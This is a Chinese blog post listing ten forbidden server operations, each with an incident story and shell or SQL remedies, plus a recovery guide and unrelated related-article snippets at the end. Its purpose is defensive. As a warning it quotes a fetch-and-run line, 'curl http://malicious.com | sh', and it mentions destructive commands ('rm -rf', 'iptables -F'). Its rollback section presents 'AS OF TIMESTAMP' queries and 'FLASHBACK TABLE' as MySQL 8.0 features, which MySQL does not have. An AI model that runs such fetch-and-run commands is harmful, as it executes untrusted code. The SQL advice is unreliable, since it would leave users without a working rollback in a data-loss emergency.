服务器禁止操作汇总(Server Prohibits 0peration Summary)
服务器禁止操作汇总
一、禁忌操作TOP10
1. 直接断电关机
💥 血泪案例:某物流公司运维拔电源强制关机,导致数据库事务中断,20万订单状态丢失。
📌 技术解析:
-
• 直接断电可能引发:
✅ 文件系统损坏(需fsck修复)
✅ 内存数据未落盘
✅ RAID卡缓存数据丢失
🛡️ 正确做法:
# 优雅关机
shutdown -h now
# 重启前同步数据
sync; sync; sync 2. 生产环境直接测试
💥 真实事故:开发人员在线上执行rm -rf ./tmp/*,误删./tmp目录(软链接指向/根目录)。
📌 致命后果:
-
• 系统文件清除 → 业务全面瘫痪
-
• 数据恢复耗时72小时
🛡️ 防护方案:
# 设置危险命令别名保护
alias rm='rm -i'
alias chmod='echo "[WARNING] 禁止直接操作!请联系架构师"' 3. 随意修改防火墙规则
💥 灾难现场:某运维为图省事关闭iptables,导致服务器被植入勒索病毒。
📌 安全准则:
-
• 禁止使用
iptables -F清空规则 -
• 变更前必须备份规则:
iptables-save > /backup/iptables_$(date +%F).rules 4. 使用root执行未知脚本
💥 中招案例:执行第三方提供的"优化脚本",实际包含curl http://malicious.com | sh。
📌 防护铁律:
-
• 必须审查脚本内容(重点检查
wget/curl下载行为) -
• 建议使用非特权用户运行:
sudo -u appuser ./deploy.sh 5. 不备份直接操作数据库
💥 经典惨案:DBA未备份直接执行ALTER TABLE,导致表结构损坏。
📌 保命流程:
-- 操作前必做
CREATE TABLE backup_table LIKE original_table;
INSERT INTO backup_table SELECT * FROM original_table; 6. 配置SSH允许密码登录
💥 攻击事件:黑客利用弱密码爆破入侵,植入挖矿程序。
🛡️ 加固方案:
# 禁用密码登录
sed -i 's/PasswordAuthentication yes/PasswordAuthentication no/g' /etc/ssh/sshd_config
# 启用密钥登录
ssh-copy-id -i ~/.ssh/id_rsa.pub user@server 7. 放任日志文件膨胀
💥 磁盘惨剧:/var/log未做切割,日志写满磁盘导致Kafka集群崩溃。
📌 根治方案:
# 配置logrotate每日切割
vim /etc/logrotate.d/nginx
/var/log/nginx/*.log { daily rotate 30 compress missingok notifempty
} 8. 使用默认端口暴露服务
💥 入侵路径:Redis 6379端口暴露公网,被批量攻击清空数据。
🛡️ 防护策略:
# 修改默认端口
vim /etc/redis.conf
port 6380
# 绑定内网IP
bind 10.0.0.1 9. 无监控变更
💥 灰度灾难:深夜升级未监控,导致服务雪崩未被及时发现。
📌 黄金法则:
# 变更时实时监控
watch -n 1 "netstat -ant | grep ESTABLISHED | wc -l"
# 关键指标基线:
- CPU使用率突增50%
- 内存消耗持续上涨
- 磁盘IO延迟>100ms 10. 长期不更新系统
💥 漏洞爆发:未修复Log4j漏洞,被勒索组织利用加密全部数据。
🛡️ 更新规范:
# 安全更新流程
yum update --security -y
# 内核更新后必须重启
reboot 二、灾难自救指南
1. 误删文件应急恢复
# 立即卸载分区防止覆盖
umount /dev/sdb1
# 使用extundelete恢复
extundelete /dev/sdb1 --restore-file /home/data.txt 2. 数据库误操作回滚
-- 闪回查询(MySQL 8.0+)
SELECT * FROM table AS OF TIMESTAMP '2024-01-01 12:00:00';
-- 生成补偿SQL
FLASHBACK TABLE table TO TIMESTAMP '2024-01-01 12:00:00'; 3. 勒索病毒应急响应
# 立即断网
ifconfig eth0 down
# 备份加密文件供后续分析
tar -czvf ransom_evidence.tar.gz /tmp/*.encrypted
# 使用chkrootkit排查后门
chkrootkit -q 据统计,80%的运维事故源于人为操作失误。记住:在服务器上的每个操作都像拆炸弹,剪错线就会粉身碎骨。
相关文章:
)
服务器禁止操作汇总(Server Prohibits 0peration Summary)
服务器禁止操作汇总 一、禁忌操作TOP10 1. 直接断电关机 💥 血泪案例:某物流公司运维拔电源强制关机,导致数据库事务中断,20万订单状态丢失。 📌 技术解析: • 直接断电可能引发: ✅ 文件系统…...
UE5 Slate类的基础创建
创建一个slate类的基础代码 #pragma onceclass SCustomDetailPlane : public SCompoundWidget {SLATE_BEGIN_ARGS(SCustomDetailPlane){}SLATE_END_ARGS()public:SCustomDetailPlane();~SCustomDetailPlane();void Construct(const FArguments& InArgs);};***************…...
springboot2.7.18升级springboot3.3.0遇到的坑
druid的警告,警告如下: 运行警告2025-02-28T09:20:31.28508:00 WARN 18800 --- [ restartedMain] trationDelegate$BeanPostProcessorChecker : Bean com.alibaba.druid.spring.boot3.autoconfigure.stat.DruidSpringAopConfiguration of type [com.a…...
服务器IPMI用户名、密码批量检查
背景 大规模服务器部署的时候,少不了较多的网管和监测平台,这些平台会去监控服务器的性能、硬件等指标参数,为了便于管理和控制,则需要给服务器IPMI带外管理添加较多的用户,这就需要对较多的服务器检查所对应的IPMI用…...
JAVA面试_进阶部分_netty面试题
1.BIO、NIO 和 AIO 的区别? BIO:一个连接一个线程,客户端有连接请求时服务器端就需要启动一个线程进行处理。线程开销大。 伪异步 IO:将请求连接放入线程池,一对多,但线程还是很宝贵的资源。 NIO&#x…...
小红书湖仓架构的跃迁之路
作者:李鹏霖(丁典),小红书-研发工程师,StarRocks Contributor & Apache Impala Committer 本文整理自小红书工程师在 StarRocks 年度峰会上的分享,介绍了小红书自助分析平台中,StarRocks 与 Iceberg 结合后&#x…...
C++-第十七章:包装器
目录 第一节:std::function 第二节:std::bind 2-1.基本介绍 2-2.调整顺序(不常用) 2-3.调整个数 2-4.std::bind与std::function 下期预告: C中有3种可调用对象:函数指针、仿函数对象、lambda函数,经过包装器包装后屏…...
如何判断邮件列表中邮箱地址的有效性?
判断邮件列表中邮箱地址的有效性,对于提高邮件送达率、避免资源浪费和维护发件人信誉至关重要。以下是一些实用的判断方法: 一、使用专业的邮箱验证工具 市面上有许多专业的邮箱验证工具,如 Geeksend邮箱验证工具 等。这些工具通过与邮件服…...
翻译: 深入分析LLMs like ChatGPT 二
监督微调(SFT) 使用人工标注的对话数据集(如1M条"用户-助手"对话)继续训练模型。 标注员遵循指导原则编写理想回答,使模型学习助手的回应风格。 示例对话格式: [系统] 你是一个有帮助的AI助手……...
conda怎么迁移之前下载的环境包,把python从3.9升级到3.10
克隆旧环境(保留旧环境作为备份) conda create -n cloned_env --clone old_env 在克隆环境中直接升级 Python conda activate cloned_env conda install python3.10 升级 Python 后出现 所有包导入失败 的问题,通常是因为依赖包与新 Pyth…...
k8s之pod的调度之污点与容忍污点,什么是污点? 如何容忍污点
在 Kubernetes 中,污点(Taint) 和 容忍(Toleration) 是用于控制 Pod 调度到特定节点的重要机制。污点允许节点拒绝某些 Pod 的调度,而容忍则允许 Pod 忽略节点的污点,从而调度到特定节点上。 1.…...
Linux切换Python版本
1、更新apt sudo apt update2、查询python安装路径 which python 或者which python33、查询安装版本 # 查看所有以 "python" 开头的命令(包括版本号) ls -l 安装路径* 例如 ls -l /usr/bin/python*4、修改软连接 udo unlink /usr/bin/pyt…...
TCP的三次握手与四次挥手:建立与终止连接的关键步骤
引言 TCP(传输控制协议)工作在OSI模型的传输层。OSI模型将计算机网络功能划分为七个层级,从底层到顶层依次是:物理层、数据链路层、网络层、传输层、会话层、表示层和应用层。传输层负责在网络节点之间提供可靠的端到端通信&a…...
2025计算机考研复试资料(附:网课+历年复试真题+140所高校真题+机试)
目录 2025 计算机考研复试经验全攻略,附超全资源🎁 (一)网课资源 (二)历年复试真题 (三)140 所高校真题 二、专业知识复习篇 (一)复试专业课程 二&…...
Milvus高性能向量数据库与大模型结合
Milvus | 高性能向量数据库,为规模而构建Milvus 是一个为 GenAI 应用构建的开源向量数据库。使用 pip 安装,执行高速搜索,并扩展到数十亿个向量。https://milvus.io/zh Milvus 是什么? Milvus 是一种高性能、高扩展性的向量数据…...
【Groovy】流程控制
1 选择结构 Groovy 中选择结构主要包含 if -else、switch 语句,并且可以返回结果。 1.1 if-else def score 85 if (score > 90) {println("优秀") } else if (score > 80) {println("良好") } else if (score > 60) {println("…...
腾讯游戏完成架构调整 IEG新设五大产品事业部
易采游戏网2月28日独家消息:继1月份腾讯天美工作室群完成内部组织架构调整后,腾讯旗下互动娱乐事业群(IEG)再次宣布对组织架构进行优化调整。此次调整的核心在于新设立了五大产品事业部,包括体育产品部、音舞产品部、V…...
达梦数据库系列之安装及Mysql数据迁移
达梦数据库系列之安装及Mysql数据迁移 1. 达梦数据库1.1 简介1.2 Docker安装达梦1.2.1 默认密码查询1.2.2 docker启动指定密码 1.3 达梦数据库连接工具1.3.1 快捷键 2 Mysql数据库迁移至达梦2.1 使用SQLark进行数据迁移 1. 达梦数据库 1.1 简介 DM8是达梦公司在总结DM系列产品…...
什么是 MGX:MetaGPT
什么是 MGX:MetaGPT MetaGPT是由思码逸(OpenDILab)团队开发的一款专注于生成式AI驱动的软件开发框架,MGX可能是其衍生或升级的相关成果,它创新性地将大语言模型引入软件开发流程,模拟人类软件团队的协作方式,能让用户通过自然语言描述需求,即可自动生成完整的软件项目,…...
java jar包内的jar包如何打补丁
问题描述: 主包:hisca.jar,解压后 BOOT-INFO/lib下有其他jar包 因为一个小bug,需要修改这个hisca包下BOOT-INF/lib下的子jar包service-hisca-impl-1.0.0.jar中的一个service类及xml文件 操作步骤: 1、主包jar -xvf …...
一个借助ai分析市场交易数据的流程方法
回答和代码借助 AI 生成,仅供参考,不构成任何专业建议。 如有投资损失请自负盈亏。 一个提取比特币的不同周期数据,并进行文本的初步分析的程序。 用途:把文本提供给ai,进行深度思考,从而达到一个相对比较…...
安装electron 提示RequestError: certificate has expired
最近需要开发electron,遇到了一个生产问题,使用了很多办法都不生效。 现在记录下具体情况 一执行 yarn add electron 就开始报错 [2/4] 🚚 Fetching packages... [3/4] 🔗 Linking dependencies... [4/4] 🔨 B…...
Flutter状态管理框架GetX最新版详解与实践指南
一、GetX框架概述 GetX是Flutter生态中轻量级、高性能的全能开发框架,集成了状态管理、路由导航、依赖注入等核心功能,同时提供国际化、主题切换等实用工具。其优势在于代码简洁性(减少模板代码约70%)和高性能(基于观…...
详细对比所有开源许可及其不同版本
qwen 以下是基于知识库内容对常见开源许可证及其不同版本的详细对比,重点突出版本间差异和核心条款变化: 1. GPL(GNU General Public License) 版本: v2 vs v3 GPLv2(1991): 要求衍生代码开源,…...
【企业场景】上线的项目如何进行限流
一、常见的四种速率限流算法 对于限流,最为直接的就是速率限流了 固定窗口算法 比如 10r/s 就是把时间线分为 1s 一段,也就是周期为 1s,对一个时间段的请求进行计数,超过 10 则舍弃,未超过则直接处理经过 1s 后&…...
git - study
文章目录 git - study概述可以用 git gui工具来添加快捷命令工具如果要在提交日志中搜索,可以用gitk的view编辑功能实验环境直接用git自带环境进行git操作的好处查看git所有配置配置全局数据配置项目专用的数据查询配置数据的原始值配置git使用的文本编辑器获取某个…...
)
编写一个程序,输出1到100的所有质数(Python版)
编写一个程序,输出1到100的所有质数 以下是一个用 Python 编写的程序,用于输出 1 到 100 的所有质数: def is_prime(n):# 检查 n 是否为质数if n < 1: # 如果 n 小于等于 1,则不是质数return False# 遍历从 2 到 n 的平方根的…...
wifi5和wifi6,WiFi 2.4G、5G,五类网线和六类网线,4G和5G的区别
wifi5和wifi6的区别 是Wi-Fi 5和Wi-Fi 6的选择与路由器密切相关。路由器是创建和管理无线网络的设备,它决定了网络的类型和性能。具体来说: 路由器的标准支持:路由器可以支持不同的Wi-Fi标准,如Wi-Fi 5(802.11ac)和Wi-Fi 6(802.11ax)。支持Wi-Fi 6的路由器能够提供更高…...
FPGA之硬件设计笔记-持续更新中
目录 1、说在前面2、FPGA硬件设计总计说明3、 原理图详解 - ARITX - 7 系列3.1 顶层框图介绍3.2 FPGA 电源sheet介绍:3.2.1 bank 14 和 bank 15的供电3.2.2 bank 0的供电3.2.3 Bank34 35 的供电 3.3 核电压和RAM电压以及辅助电压 4 原理图详解-- Ultrascale ARTIX4.…...
)
Python--内置模块和开发规范(上)
1. 内置模块 1.1 JSON 模块 核心功能 序列化:Python 数据类型 → JSON 字符串 import json data [{"id": 1, "name": "武沛齐"}, {"id": 2, "name": "Alex"}] json_str json.dumps(data, ensure_a…...